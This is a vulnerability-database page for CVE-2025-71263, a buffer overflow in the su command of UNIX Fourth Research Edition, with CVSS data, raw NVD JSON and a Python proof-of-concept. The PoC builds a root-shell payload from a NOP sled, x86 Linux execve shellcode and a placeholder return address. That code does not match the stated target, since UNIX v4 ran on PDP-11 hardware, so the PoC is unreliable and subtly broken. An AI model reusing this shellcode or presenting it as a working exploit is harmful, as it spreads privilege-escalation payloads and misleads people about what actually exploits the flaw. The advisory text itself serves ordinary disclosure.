Security Vulnerability Report
中文
CVE-2025-71263 CVSS 7.4 HIGH

CVE-2025-71263

Published: 2026-03-13 19:53:54
Last Modified: 2026-03-21 22:16:18
Source: [email protected]

Description

In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

UNIX Fourth Research Edition (v4) su命令 < 所有版本(已停止维护)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-71263 PoC - UNIX v4 su command buffer overflow This PoC demonstrates the buffer overflow in the su command's password handling. Note: This is for educational and authorized testing purposes only. """ import subprocess import struct import sys def create_exploit_payload(): """ Create a payload that exploits the 100-byte password buffer overflow. The payload is designed to overwrite the return address on the stack. """ # Buffer size in the vulnerable code BUFFER_SIZE = 100 # NOP sled for more reliable exploitation nop_sled = b'\x90' * 40 # Shellcode for spawning a root shell (example) # This is a simple execve("/bin/sh", ["/bin/sh", NULL], NULL) shellcode shellcode = ( b'\x31\xc0' # xor eax, eax b'\x50' # push eax b'\x68' # push \x2f\x2f\x73\x68 (//sh) b'//sh' b'\x68' # push \x2f\x62\x69\x6e (/bin) b'/bin' b'\x89\xe3' # mov ebx, esp b'\x50' # push eax b'\x53' # push ebx b'\x89\xe1' # mov ecx, esp b'\x31\xd2' # xor edx, edx b'\xb0\x0b' # mov al, 0xb (execve) b'\xcd\x80' # int 0x80 ) # Padding to reach the return address padding = b'A' * (BUFFER_SIZE - len(nop_sled) - len(shellcode)) # Target return address (would need to be determined for specific target) # This is a placeholder - in real exploitation, this should point to nop sled or shellcode return_address = struct.pack('<I', 0xbffff500) # Example stack address payload = nop_sled + shellcode + padding + return_address return payload def test_vulnerability(): """ Test if the system is vulnerable by attempting to trigger the buffer overflow. """ print("[*] CVE-2025-71263 - UNIX v4 su command Buffer Overflow") print("[*] This PoC is for authorized testing only") try: payload = create_exploit_payload() print(f"[*] Generated payload length: {len(payload)} bytes") print(f"[*] Payload (hex): {payload.hex()}") # In a real scenario, this would be passed to the su command # subprocess.run(['su', '-c', 'id'], input=payload, timeout=5) print("[!] Note: This vulnerability affects UNIX v4 which is rare in production") print("[!] Actual exploitation requires the vulnerable UNIX v4 system") except Exception as e: print(f"[-] Error: {e}") if __name__ == '__main__': test_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71263", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:53.983", "lastModified": "2026-03-21T22:16:18.207", "vulnStatus": "Awaiting Analysis", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "In UNIX Fourth Research Edition (v4), the su command is vulnerable to a buffer overflow due to the 'password' variable having a fixed size of 100 bytes. A local user can exploit this to gain root privileges. It is unlikely that UNIX v4 is running anywhere outside of a very small number of lab environments. NOTE: This vulnerability only affects products that are no longer supported by the maintainer."}, {"lang": "es", "value": "En UNIX Cuarta Edición de Investigación (v4), el comando su es vulnerable a un desbordamiento de búfer debido a que la variable 'password' tiene un tamaño fijo de 100 bytes. Un usuario local puede explotar esto para obtener privilegios de root. Es poco probable que UNIX v4 se esté ejecutando en algún lugar fuera de un número muy reducido de entornos de laboratorio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://discuss.systems/@ricci/115747843169814700", "source": "[email protected]"}, {"url": "https://sigma-star.at/blog/2025/12/unix-v4-buffer-overflow/", "source": "[email protected]"}, {"url": "https://www.spinellis.gr/blog/20251223/", "source": "[email protected]"}, {"url": "https://www.tuhs.org/pipermail/tuhs/2026-January/032991.html", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/20/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/21/4", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.